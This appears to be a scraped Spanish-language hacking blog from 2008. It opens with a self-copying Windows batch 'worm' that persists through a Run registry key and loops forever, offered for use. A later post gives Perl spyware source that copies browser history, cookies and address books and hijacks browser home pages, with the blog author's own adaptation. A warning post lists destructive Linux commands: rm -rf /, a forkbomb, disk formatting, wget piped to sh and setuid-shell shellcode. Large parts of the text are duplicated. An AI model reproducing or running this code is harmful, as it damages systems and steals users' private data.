Se reproduce millones de veces, cada vez que enciendes el pc.
A guardar en .bat
Como todos :D
@echo off
copy %0%windir%\\system32\\worm.bat
REG ADD HKLM\\software\\microsoft\\windows\\currentversion \\run /v hack
/d %windir%\\system32\\worm.bat
:worm
cd\\
cd %homepatch%
cd escritorio
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
cd\\
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
goto worm
Sign by Dealighted - Black Friday Coupons
martes, 30 de diciembre de 2008
sábado, 27 de diciembre de 2008
Comandos Linux
Linux tampoco esta libre de usuarios malintencionados y si eres nuevo en este entorno no esta de mas que conozcas estas cosas. Existen comandos que no es recomendable ejecutar en nuestro sistema o evitar ejecutar si estan contenidos dentro de shell scripts. Yo siempre digo que no hagais Copy & Paste al tuntun de comandos, o si os bajais algun script de un sitio que no conozcais, lo editeis al menos antes y echeis un vistazo a su contenido para evitar luego males mayores.
Algunos de estos comandos “peligrosos” son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){::&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
De http://ubuntulife.wordpress.com
Algunos de estos comandos “peligrosos” son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){::&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
De http://ubuntulife.wordpress.com
viernes, 26 de diciembre de 2008
Descargas simultaneas en Rapidshare
Con esta sencilla aplicación podrás descargar varios ficheros a la vez.
Para descargar archivos simplemente debemos colocar el link de rapidshare donde dice rapidshare url y poner go, y nos saldra la pagina de rapidshare como si estuvieramos conectado con otra ip, y a partir de ahy seguimos los pasos tipicos para descargar de rapidshare.
-->Descargar<--
Para descargar archivos simplemente debemos colocar el link de rapidshare donde dice rapidshare url y poner go, y nos saldra la pagina de rapidshare como si estuvieramos conectado con otra ip, y a partir de ahy seguimos los pasos tipicos para descargar de rapidshare.
-->Descargar<--
Crear spyware
Lo interesante de este texto que está por Internet es el código fuente.
Respecto a protegerte del spyware, puede leerse este artículo:
http://www.microsoft.com/latam/technet/seguridad/articulos/adware.asp
Los spyware en si tienen una similitud con los virus, pero a diferencia del virus el spyware no tienen codigo dañino para nuestros ordenadores, por esta razon nuestros antivirus no se pueden encargar de reconocerlos y eliminarlos.
Entonces podemos decir que los spyware son como pequeños programas que se instalan en nuestro ordenador y espian nuestros datos y lo que hacemos en la red con el unico fin de enviar esa informacion espiada a empresas de publicidad en la internet, con esos datos esas empresas puede comerzialisar y incluso regresar spam por correo electronico. El spyware trabajaa en background es decir en modo de [segundo plano] esto lo hacen con el proposito de no nos demos cuenta de que el esta ahi hasta que aparezca el primer sintoma.
Si tenemos spywares en nuestro ordenador es peligroso, porque al espiar pueden encontrar, tu direccion de correo electronico e incluso su password. Al tenerlo los espias podrian floodeart de spam. Direcciones de ip y DNS, telefono, pais, paginas que visitas y algunos websites que te interesen, es decir todo lo que hagas en la red podria ser espiado por ellos. Para mi lo mas peligroso es que ellos pueden saber lo que tu compras en la red, y al comprar necesitas o una CC [Tarjeta de Credito] o una CB [Cuenta Bancaria], al ingresar estos datos podrian ser capturados por los spywares.
Los spywares mas comunes que puedan ingresar en tu ordenador son los siguientes: AdSofware, Alexa, Cydoors, Gator, Web3000, Webhancer, CoolWebSearch, BlazeFind.Bridge, Xupiter, Hotbar, Kazaa etc....
Alguno de los sintomas mas comunes que siente nuestro ordenador cuando obtiene spyware pueden ser los siguentes:
[] Nuevas paginas favoritas agregadas a la lista de tu explorador.
[] Errores de navegacion en tu explorador.
[] Paginas de inicio modificadas, y/o cambiadas a otras.
[] Comienzan a aparecernos pop ups a lo loco. Aun sin estar conectado, y sin tener el explorer abierto.
[] Las famosas tool bars o search bars comienzan a aparecer.
[] Nuevos botones, y utilidades se bajan, como junk soft o programas basura.
[] Notas el incremente de porn websites ves porno a menudo, y incluso en tu ordenador aparecen, el mas comun es el HotTartz.
[] La velocidad de tu tu navegador varia.
Para protegernos antes estos espias necesitamos armarnos de software que los repela y los elimine. Estos software son muy facil de encontrar, ademas son freeware. Ahora les dejare una lista de donde descargarnos los mas comunes y mas utiles.
SpyBlaster 3.3 [2.5MB]
http://securityhelpers.net/downloads/spywareblastersetup33.exe
SpyBot Search & Destroy 1.3 [4.6MB]
http://tucows.wau.nl/files/spybotsd13.exe
Adware SE Tweak SE [0.5MB]
http://download.lavasoft.de.edgesuite.net/public/pltweakse.exe
HijackThis 1.9.91 [0.1MB]
http://merijn.arwinianos.net/HijackThis.exe
Si necesitas una lista mucho mas amplia porfavor ve a la siguiente direccion: http://www.elhacker.net/seguridad.htm#A%20n%20t%20i%20%20-%20%20W%20o%20r%20m%20s
Ahora lo mas impresionante en este pequeño articulo, es que posee el primer codigo abierto de un spyware, los codigos de los spywares casi nunca son vistos.
Este me lo encontre en Kspyware una nueva web la cual fue echa con el unico proposito de sacar a luz un spyware echo en perl http://nzeka-labs.com/hacking/KSpyware.htm
KSpyware es el primer open source spyware accesible en la net.
Aqui les dejo el codigo fuente de KSpyware el cual esta hecho en Perl:
Código:
############################################
### KSpyware v0.1 for educational purpose ###############
############################################
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
Ahora les explicare para que sirve cada modulo de este codigo en perl.
Con este codigo obtendremos una lista de programas instalados en el sistema.
Código:
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.
Código:
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...
Código:
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.
Código:
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.
Código:
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
Y con este el entry point...
Código:
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
-----------------------------------------------------------------------------
Basandonos en el codigo podemos crear nuestro propio spyware, aqui la prueba
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
En Perl seria asi para sabotear el IE
Con esto sabotearemos el IE y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Con esto sabotearemos el mozilla y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Entonces claro como no se muxo Perl me estoy basando en el codigo anterior. Entonces mas o menos esto llevariamos, el spyware nos cambiaria la pagina principal de el IE y del Mozilla.
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/t", "REG_SZ" ];
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= ["http://nobanet.xternal-host.com/", "REG_SZ" ];
No quiero entrar en tantos datos porque el perl no es mi lenguaje jeje y la verdad no soy programador, se ahi un poco de FORTRAN, COBOL, C pero pues el resto de lenguajes lo que se es lo basico, pero claro con este codigo y un poco de imaginacion podemos hacer mucho.
Cedido por P3t3rp4n
Comentarios, d su blog:
Para hacerlo funcionar:
Pues el código perl, tendrías que descargarte el intérprete (Active Perl) e instalarlo. Después te metes en el directorio en el que lo has instalado y pones perl [nombre del archivo] para ejecutarlo. De todos modos, el código es tan solo una prueba de concepto; actúa sobre tu propio ordenador, no en remoto, y además es código fragmentario de como acceder a los datos, no lo manda ni lo utiliza...
Aquí tienes un manual de pearl, pero sin unas bases sólidas de informática, esto requiere demasiado tiempo y normalmente pocos resultados:
http://www.manualesutiles.com/manuales/Manual%20de%20pearl.zip
Respecto a protegerte del spyware, puede leerse este artículo:
http://www.microsoft.com/latam/technet/seguridad/articulos/adware.asp
Los spyware en si tienen una similitud con los virus, pero a diferencia del virus el spyware no tienen codigo dañino para nuestros ordenadores, por esta razon nuestros antivirus no se pueden encargar de reconocerlos y eliminarlos.
Entonces podemos decir que los spyware son como pequeños programas que se instalan en nuestro ordenador y espian nuestros datos y lo que hacemos en la red con el unico fin de enviar esa informacion espiada a empresas de publicidad en la internet, con esos datos esas empresas puede comerzialisar y incluso regresar spam por correo electronico. El spyware trabajaa en background es decir en modo de [segundo plano] esto lo hacen con el proposito de no nos demos cuenta de que el esta ahi hasta que aparezca el primer sintoma.
Si tenemos spywares en nuestro ordenador es peligroso, porque al espiar pueden encontrar, tu direccion de correo electronico e incluso su password. Al tenerlo los espias podrian floodeart de spam. Direcciones de ip y DNS, telefono, pais, paginas que visitas y algunos websites que te interesen, es decir todo lo que hagas en la red podria ser espiado por ellos. Para mi lo mas peligroso es que ellos pueden saber lo que tu compras en la red, y al comprar necesitas o una CC [Tarjeta de Credito] o una CB [Cuenta Bancaria], al ingresar estos datos podrian ser capturados por los spywares.
Los spywares mas comunes que puedan ingresar en tu ordenador son los siguientes: AdSofware, Alexa, Cydoors, Gator, Web3000, Webhancer, CoolWebSearch, BlazeFind.Bridge, Xupiter, Hotbar, Kazaa etc....
Alguno de los sintomas mas comunes que siente nuestro ordenador cuando obtiene spyware pueden ser los siguentes:
[] Nuevas paginas favoritas agregadas a la lista de tu explorador.
[] Errores de navegacion en tu explorador.
[] Paginas de inicio modificadas, y/o cambiadas a otras.
[] Comienzan a aparecernos pop ups a lo loco. Aun sin estar conectado, y sin tener el explorer abierto.
[] Las famosas tool bars o search bars comienzan a aparecer.
[] Nuevos botones, y utilidades se bajan, como junk soft o programas basura.
[] Notas el incremente de porn websites ves porno a menudo, y incluso en tu ordenador aparecen, el mas comun es el HotTartz.
[] La velocidad de tu tu navegador varia.
Para protegernos antes estos espias necesitamos armarnos de software que los repela y los elimine. Estos software son muy facil de encontrar, ademas son freeware. Ahora les dejare una lista de donde descargarnos los mas comunes y mas utiles.
SpyBlaster 3.3 [2.5MB]
http://securityhelpers.net/downloads/spywareblastersetup33.exe
SpyBot Search & Destroy 1.3 [4.6MB]
http://tucows.wau.nl/files/spybotsd13.exe
Adware SE Tweak SE [0.5MB]
http://download.lavasoft.de.edgesuite.net/public/pltweakse.exe
HijackThis 1.9.91 [0.1MB]
http://merijn.arwinianos.net/HijackThis.exe
Si necesitas una lista mucho mas amplia porfavor ve a la siguiente direccion: http://www.elhacker.net/seguridad.htm#A%20n%20t%20i%20%20-%20%20W%20o%20r%20m%20s
Ahora lo mas impresionante en este pequeño articulo, es que posee el primer codigo abierto de un spyware, los codigos de los spywares casi nunca son vistos.
Este me lo encontre en Kspyware una nueva web la cual fue echa con el unico proposito de sacar a luz un spyware echo en perl http://nzeka-labs.com/hacking/KSpyware.htm
KSpyware es el primer open source spyware accesible en la net.
Aqui les dejo el codigo fuente de KSpyware el cual esta hecho en Perl:
Código:
############################################
### KSpyware v0.1 for educational purpose ###############
############################################
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
Ahora les explicare para que sirve cada modulo de este codigo en perl.
Con este codigo obtendremos una lista de programas instalados en el sistema.
Código:
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.
Código:
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...
Código:
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.
Código:
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.
Código:
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
Y con este el entry point...
Código:
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
-----------------------------------------------------------------------------
Basandonos en el codigo podemos crear nuestro propio spyware, aqui la prueba
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
En Perl seria asi para sabotear el IE
Con esto sabotearemos el IE y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Con esto sabotearemos el mozilla y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Entonces claro como no se muxo Perl me estoy basando en el codigo anterior. Entonces mas o menos esto llevariamos, el spyware nos cambiaria la pagina principal de el IE y del Mozilla.
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/t", "REG_SZ" ];
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= ["http://nobanet.xternal-host.com/", "REG_SZ" ];
No quiero entrar en tantos datos porque el perl no es mi lenguaje jeje y la verdad no soy programador, se ahi un poco de FORTRAN, COBOL, C pero pues el resto de lenguajes lo que se es lo basico, pero claro con este codigo y un poco de imaginacion podemos hacer mucho.
Cedido por P3t3rp4n
Comentarios, d su blog:
Para hacerlo funcionar:
Pues el código perl, tendrías que descargarte el intérprete (Active Perl) e instalarlo. Después te metes en el directorio en el que lo has instalado y pones perl [nombre del archivo] para ejecutarlo. De todos modos, el código es tan solo una prueba de concepto; actúa sobre tu propio ordenador, no en remoto, y además es código fragmentario de como acceder a los datos, no lo manda ni lo utiliza...
Aquí tienes un manual de pearl, pero sin unas bases sólidas de informática, esto requiere demasiado tiempo y normalmente pocos resultados:
http://www.manualesutiles.com/manuales/Manual%20de%20pearl.zip
Añadir mp3 a tus ppt
Resulta que ayer estaba haciendo una presentación en PowerPoint para mandársela a mis amigos y quería meterle musiquita.
Total, que lo hacía con insertar - películas y sonidos - sonido de archivo, y no lo incrustaba sino que lo vinculaba. Es decir, la presentación buscaba el archivo de sonido ubicado en mi disco duro, de modo que si lo enviaba, al no encontrar el archivo en el disco duro de mi amigo, pues no se reproducía.
El primer problema resultó ser el tamaño del archivo. Se ve que por defecto PowerPoint no incrusta, sino que vincula localmente, los archivos insertados que sean mayores de 100 KB.
Este tamaño límite a partir del cual vincula y por debajo del cual incrusta, se puede cambiar hasta un máximo de 50 MB. Está en Herramientas - Opciones - Pestaña General - Vincular archivos de sonido mayores de: 10000 KB. Esto haremos que se incrusten todos los archivos que sean menores de 10 MB.
Aún así el dichoso archivo seguía sin incrustarse. Por lo visto resulta que PowerPoint sólo incrusta archivos de sonido de extensión wav, y el mío era mp3. Naturalmente, cambiar la extensión "a mano" es como arrancarle a tu Renault su marca y poner la de un Mercedes. No deja de ser un Renault.
Probé a cambiar el formato con algún conversor, pero el archivo wav resultante ocupaba como cinco o séis veces más que el mp3, de modo que la presentación pesaba demasiado.
Finalmente la solución vino de mano del programa WaveMP3, que agarra un archivo MP3 y le incluye una cabecera de WAV. De hecho, este programa genera un archivo WAV con el mismo nombre que el archivo MP3 que se le proporciona, pero con una cabecera que engañará al Powerpoint. Y el tamaño del archivo resultante es el mismo que el del mp3.
Por otro lado, si estáis en estas lides, para que la reproducción vuelva a empezar cuando se acabe no olvidéis activar la casilla "Repetir la reproducción hasta su interrupción", en Modificar objeto de sonido (botón derecho sobre la imagen).
Información facilitada por P3t3rp4n GRACIAS!!!
